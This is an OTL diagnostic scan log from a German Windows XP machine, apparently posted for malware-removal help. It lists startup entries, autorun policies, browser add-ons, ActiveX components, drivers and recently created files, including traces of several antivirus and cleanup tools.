O4 - HKLM..\Run: [WSwitch] C:\Programme\Panasonic\WSwitch\WSwitch.exe (Matsushita Electric Industrial Co., Ltd.)
O4 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004..\Run: [LightScribe Control Panel] C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe (Hewlett-Packard Company) O4 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004..\Run: [SandboxieControl] C:\Programme\Sandboxie\SbieCtrl.exe (tzuk) O4 - HKU\.DEFAULT..\RunOnce: [ShowDeskFix] File not found O4 - HKU\S-1-5-18..\RunOnce: [ShowDeskFix] File not found O4 - Startup: C:\Dokumente und Einstellungen\***\Startmenü\Programme\Autostart\Secunia PSI.lnk = C:\Programme\Secunia\PSI\psi.exe (Secunia) O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Low Rights present O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0 O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323 O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863 O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323 O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863 O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 149 O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O7 - 
HKU\S-1-5-21-1957994488-1580818891-842925246-1004\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323 O7 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863 O7 - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0 O9 - Extra 'Tools' menuitem : Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\npjpi160_06.dll (Sun Microsystems, Inc.) O9 - Extra Button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll () O9 - Extra 'Tools' menuitem : Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll () O16 - DPF: {31435657-9980-0010-8000-00AA00389B71} hxxp://download.microsoft.com/download/e/2/f/e2fcec4b-6c8b-48b7-adab-ab9c403a978f/wvc1dmo.cab (Reg Error: Key error.) 
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1276015979588 (WUWebControl Class) O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1276015904580 (MUWebControl Class) O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_06-windows-i586.cab (Java Plug-in 1.6.0_06) O16 - DPF: {CAFEEFAC-0016-0000-0006-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_06-windows-i586.cab (Java Plug-in 1.6.0_06) O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_06-windows-i586.cab (Java Plug-in 1.6.0_06) O18 - Protocol\Handler\http\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\http\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\https\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\https\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation) O20 - 
Winlogon\Notify\igfxcui: DllName - igfxsrvc.dll - C:\WINDOWS\System32\igfxsrvc.dll (Intel Corporation) O24 - Desktop Components:0 (Die derzeitige Homepage) - About:Home O24 - Desktop WallPaper: C:\Dokumente und Einstellungen\***\Anwendungsdaten\Opera\Opera\profile\skin\1-4_step_in_eternity.bmp O24 - Desktop BackupWallPaper: C:\Dokumente und Einstellungen\***\Anwendungsdaten\Opera\Opera\profile\skin\1-4_step_in_eternity.bmp O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2008.08.27 00:40:34 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ] O34 - HKLM BootExecute: (autocheck autochk *) - File not found O34 - HKLM BootExecute: (sprestrt) - C:\WINDOWS\System32\sprestrt.exe (Microsoft Corporation) O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = ComFile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* NetSvcs: 6to4 - File not found NetSvcs: Ias - C:\WINDOWS\system32\ias [2010.06.08 17:01:38 | 000,000,000 | ---D | M] NetSvcs: Iprip - File not found NetSvcs: Irmon - File not found NetSvcs: NWCWorkstation - File not found NetSvcs: Nwsapagent - File not found NetSvcs: WmdmPmSp - File not found MsConfig - State: "system.ini" - 0 MsConfig - State: "win.ini" - 0 MsConfig - State: "bootini" - 0 MsConfig - State: "services" - 0 MsConfig - State: "startup" - 0 SafeBootMin: Base - Driver Group SafeBootMin: Boot Bus Extender - Driver Group SafeBootMin: Boot file system - Driver Group SafeBootMin: File system - Driver Group SafeBootMin: Filter - Driver Group SafeBootMin: PCI Configuration - Driver Group SafeBootMin: PNP Filter - Driver Group SafeBootMin: Primary disk - Driver Group SafeBootMin: SCSI Class - Driver Group SafeBootMin: sermouse.sys - Driver SafeBootMin: System Bus Extender - Driver Group SafeBootMin: vga.sys - Driver SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootMin: 
{4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootNet: Base - Driver Group SafeBootNet: Boot Bus Extender - Driver Group SafeBootNet: Boot file system - Driver Group SafeBootNet: File system - Driver Group SafeBootNet: Filter - Driver Group SafeBootNet: NDIS Wrapper - Driver Group SafeBootNet: NetBIOSGroup - Driver Group SafeBootNet: NetDDEGroup - Driver Group SafeBootNet: Network - Driver Group SafeBootNet: NetworkProvider - Driver Group SafeBootNet: PCI Configuration - Driver Group SafeBootNet: PNP Filter - Driver Group SafeBootNet: PNP_TDI - Driver Group SafeBootNet: Primary disk - Driver Group SafeBootNet: SCSI Class - Driver Group SafeBootNet: sermouse.sys - Driver SafeBootNet: Streams Drivers - Driver Group SafeBootNet: System Bus Extender - Driver Group SafeBootNet: TDI - Driver Group SafeBootNet: vga.sys - Driver SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - 
Mouse SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun) ActiveX: {10072CEC-8CC1-11D1-986E-00A0C955B42F} - Vektorgrafik-Rendering (VML) ActiveX: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "C:\Programme\Gemeinsame Dateien\LightScribe\LSRunOnce.exe" ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - Microsoft NetShow Player ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 6.4 ActiveX: {233C1507-6A77-46A4-9443-F871F945D258} - Adobe Shockwave Director 11.0 ActiveX: {283807B5-2C60-11D0-A31D-00AA00B92C03} - DirectAnimation ActiveX: {2A202491-F00D-11cf-87CC-0020AFEECF20} - Adobe Shockwave Director 11.0 ActiveX: {2A3320D6-C805-4280-B423-B665BDE33D8F} - Microsoft .NET Framework 1.1 Security Update (KB979906) ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll ActiveX: {36f8ec70-c29a-11d1-b5c7-0000f8051515} - Dynamic HTML-Datenbindung für Java ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack ActiveX: {3bf42070-b3b1-11d1-b5c5-0000f8051515} - Uniscribe ActiveX: {411EDCF7-755D-414E-A74B-3DCD6583F589} - Microsoft .NET Framework 1.1 Service Pack 1 (KB867460) ActiveX: {4278c270-a269-11d1-b5bf-0000f8051515} - Erweitertes Authoring ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - 
"%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install ActiveX: {44BBA842-CC51-11CF-AAFA-00AA00B6015B} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - DirectShow ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help ActiveX: {4f216970-c90c-11d1-b5c7-0000f8051515} - DirectAnimation Java Classes ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.7 ActiveX: {5945c046-1e7d-11d1-bc44-00c04fd912be} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser ActiveX: {5A8D6EE0-3E18-11D0-821E-444553540000} - ICW ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\WINDOWS\system32\ie4uinit.exe -BaseSettings ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - c:\WINDOWS\system32\Rundll32.exe c:\WINDOWS\system32\mscories.dll,Install ActiveX: {9309DD7E-EBFE-3C95-8B47-30D3A012F606} - .NET Framework ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding ActiveX: {ACC563BC-4266-43f0-B6ED-9D38C4202C7E} - ActiveX: {B508B3F1-A24A-32C0-B310-85786919EF28} - .NET Framework ActiveX: {C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F} - .NET Framework ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts ActiveX: {CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1} - .NET Framework ActiveX: 
{CC2A9BA0-3BDD-11D0-821E-444553540000} - Taskplaner ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1 ActiveX: {D27CDB6E-AE6D-11cf-96B8-444553540000} - Macromedia Shockwave Flash ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help ActiveX: {E78BFA60-5393-4C38-82AB-E8019E464EB4} - .NET Framework ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface ActiveX: {EF289A85-8E57-408d-BE47-73B55609861A} - RootsUpdate ActiveX: <{12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\WINDOWS\system32\ieudinit.exe ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\WINDOWS\inf\unregmp2.exe /ShowWMP ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\WINDOWS\system32\ie4uinit.exe -UserIconConfig ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS - RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP ActiveX: >{881dd1c5-3dcf-431b-b061-f3f88e8be88a} - %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE ActiveX: Microsoft Base Smart Card Crypto Provider Package - Drivers32: msacm.iac2 - C:\WINDOWS\system32\iac25_32.ax (Intel Corporation) Drivers32: msacm.imc - C:\WINDOWS\System32\IMC32.acm (Intel Corporation) Drivers32: msacm.l3acm - C:\WINDOWS\system32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS) Drivers32: msacm.l3codecp - C:\WINDOWS\System32\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS) Drivers32: msacm.sl_anet - C:\WINDOWS\System32\sl_anet.acm (Sipro Lab Telecom Inc.) Drivers32: msacm.trspch - C:\WINDOWS\System32\tssoft32.acm (DSP GROUP, INC.) Drivers32: vidc.cvid - C:\WINDOWS\System32\iccvid.dll (Radius Inc.) 
Drivers32: VIDC.i263 - C:\WINDOWS\System32\I263_32.drv (Intel Corporation) Drivers32: vidc.iv31 - C:\WINDOWS\System32\ir32_32.dll () Drivers32: vidc.iv32 - C:\WINDOWS\System32\ir32_32.dll () Drivers32: VIDC.IV40 - C:\WINDOWS\System32\ir41_32.ax (Intel Corporation) Drivers32: vidc.iv41 - C:\WINDOWS\System32\ir41_32.ax (Intel Corporation) Drivers32: vidc.iv50 - C:\WINDOWS\System32\ir50_32.dll (Intel Corporation) Drivers32: vidc.MP42 - Mpg4c32.dll File not found Drivers32: vidc.MP43 - Mpg4c32.dll File not found Drivers32: vidc.MPG4 - Mpg4c32.dll File not found Drivers32: VIDC.VP70 - C:\WINDOWS\System32\vp7vfw.dll (On2.com) Drivers32: VIDC.wmv3 - C:\WINDOWS\System32\WMV9VCM.dll (Microsoft Corporation) Drivers32: vidc.XVID - C:\WINDOWS\System32\xvidvfw.dll () CREATERESTOREPOINT Restore point Set: OTL Restore Point (16902109354000384) ========== Files/Folders - Created Within 60 Days ========== [2010.07.03 17:16:25 | 000,574,464 | ---- | C] (OldTimer Tools) -- C:\Dokumente und Einstellungen\***\Desktop\OTL.exe [2010.06.28 23:17:57 | 000,000,000 | -HSD | C] -- C:\RECYCLER [2010.06.28 23:16:02 | 000,000,000 | ---D | C] -- C:\WINDOWS\temp [2010.06.28 13:40:27 | 000,000,000 | ---D | C] -- C:\Programme\Secunia [2010.06.27 20:55:11 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\ESET [2010.06.25 23:58:12 | 000,000,000 | ---D | C] -- C:\Programme\xerox [2010.06.25 23:58:11 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\xircom [2010.06.25 23:58:03 | 000,000,000 | ---D | C] -- C:\Programme\microsoft frontpage [2010.06.25 23:47:40 | 000,000,000 | RHSD | C] -- C:\cmdcons [2010.06.25 23:44:12 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe [2010.06.25 23:44:12 | 000,161,792 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe [2010.06.25 23:44:12 | 000,136,704 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe [2010.06.25 23:44:12 | 000,031,232 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe [2010.06.25 23:44:01 
| 000,000,000 | ---D | C] -- C:\WINDOWS\ERDNT [2010.06.25 23:43:20 | 000,000,000 | ---D | C] -- C:\Qoobox [2010.06.20 21:01:28 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Malwarebytes [2010.06.20 21:01:15 | 000,038,224 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys [2010.06.20 21:01:14 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Malwarebytes [2010.06.20 21:01:13 | 000,020,952 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys [2010.06.20 21:01:11 | 000,000,000 | ---D | C] -- C:\Programme\Malwarebytes' Anti-Malware [2010.06.19 20:33:32 | 000,000,000 | ---D | C] -- C:\Programme\Sophos [2010.06.19 20:08:52 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\***\Eigene Dateien\Meine empfangenen Dateien [2010.06.18 13:17:29 | 000,000,000 | ---D | C] -- C:\Programme\Trend Micro [2010.06.15 02:28:04 | 000,000,000 | ---D | C] -- C:\Kaspersky Rescue Disk 10.0 [2010.06.14 16:00:27 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\ESET [2010.06.14 13:51:56 | 000,000,000 | ---D | C] -- C:\Programme\ESET [2010.06.14 13:51:56 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\ESET [2010.06.11 12:13:33 | 000,285,696 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\System32\dllcache\atmfd.dll [2010.06.11 12:13:26 | 000,075,776 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\strmfilt.dll [2010.06.11 12:13:26 | 000,025,088 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\httpapi.dll [2010.06.11 12:13:25 | 000,265,728 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\http.sys [2010.06.11 00:20:31 | 000,000,000 | ---D | C] -- C:\Meine Webseiten [2010.06.11 00:16:51 | 000,000,000 | ---D | C] -- C:\Programme\WinHTTrack [2010.06.08 19:10:18 | 000,691,712 | ---- | C] (Microsoft Corporation) 
-- C:\WINDOWS\System32\dllcache\inetcomm.dll [2010.06.08 19:09:59 | 000,430,080 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\vbscript.dll [2010.06.08 19:09:25 | 000,100,864 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\6to4svc.dll [2010.06.08 19:09:00 | 000,457,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mrxsmb.sys [2010.06.08 19:08:50 | 003,558,912 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\moviemk.exe [2010.06.08 19:08:35 | 000,346,624 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mspaint.exe [2010.06.08 19:08:25 | 000,353,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\srv.sys [2010.06.08 19:08:17 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\avifil32.dll [2010.06.08 19:08:17 | 000,048,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iyuv_32.dll [2010.06.08 19:08:17 | 000,028,672 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msvidc32.dll [2010.06.08 19:08:17 | 000,011,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msrle32.dll [2010.06.08 19:08:17 | 000,008,704 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\tsbyuv.dll [2010.06.08 19:07:59 | 001,297,408 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\quartz.dll [2010.06.08 19:07:59 | 000,017,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msyuv.dll [2010.06.08 19:07:44 | 000,033,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\csrsrv.dll [2010.06.08 19:07:33 | 000,474,624 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\shlwapi.dll [2010.06.08 19:07:22 | 000,477,696 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mshtmled.dll [2010.06.08 19:07:21 | 000,671,232 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mstime.dll 
[2010.06.08 19:07:21 | 000,214,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\dxtrans.dll [2010.06.08 19:07:21 | 000,193,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msrating.dll [2010.06.08 19:07:21 | 000,193,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iepeers.dll [2010.06.08 19:07:21 | 000,161,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieakui.dll [2010.06.08 19:07:21 | 000,153,088 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieakeng.dll [2010.06.08 19:07:21 | 000,102,912 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\occache.dll [2010.06.08 19:07:21 | 000,052,224 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msfeedsbs.dll [2010.06.08 19:07:21 | 000,017,408 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\corpol.dll [2010.06.08 19:07:20 | 001,040,384 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieframe.dll.mui [2010.06.08 19:07:20 | 000,388,608 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iedkcs32.dll [2010.06.08 19:07:20 | 000,347,136 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\dxtmsft.dll [2010.06.08 19:07:20 | 000,233,472 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\webcheck.dll [2010.06.08 19:07:20 | 000,230,400 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieaksie.dll [2010.06.08 19:07:20 | 000,132,608 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\extmgr.dll [2010.06.08 19:07:20 | 000,044,544 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\pngfilt.dll [2010.06.08 19:07:20 | 000,044,544 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iernonce.dll [2010.06.08 19:07:19 | 002,452,872 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieapfltr.dat [2010.06.08 19:07:19 | 000,841,216 | 
---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wininet.dll [2010.06.08 19:07:19 | 000,268,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iertutil.dll [2010.06.08 19:07:18 | 000,634,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iexplore.exe [2010.06.08 19:07:18 | 000,459,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msfeeds.dll [2010.06.08 19:07:18 | 000,380,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieapfltr.dll [2010.06.08 19:07:18 | 000,124,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\advpack.dll [2010.06.08 19:07:18 | 000,105,984 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\url.dll [2010.06.08 19:07:18 | 000,078,336 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieencode.dll [2010.06.08 19:07:18 | 000,070,656 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ie4uinit.exe [2010.06.08 19:07:18 | 000,063,488 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\icardie.dll [2010.06.08 19:07:18 | 000,027,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\jsproxy.dll [2010.06.08 19:07:18 | 000,013,824 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieudinit.exe [2010.06.08 19:07:17 | 001,830,912 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\inetcpl.cpl [2010.06.08 19:07:17 | 001,171,968 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\urlmon.dll [2010.06.08 19:07:16 | 006,071,296 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieframe.dll [2010.06.08 19:06:17 | 000,119,808 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\t2embed.dll [2010.06.08 19:06:17 | 000,081,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\fontsub.dll [2010.06.08 19:05:49 | 000,271,360 | ---- | C] (Microsoft Corporation) -- 
Extras.txt Code:
OTL Extras logfile created on: 03.07.2010 17:21:09 - Run 3 OTL by OldTimer - Version 3.2.7.0 Folder = C:\Dokumente und Einstellungen\***\Desktop Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
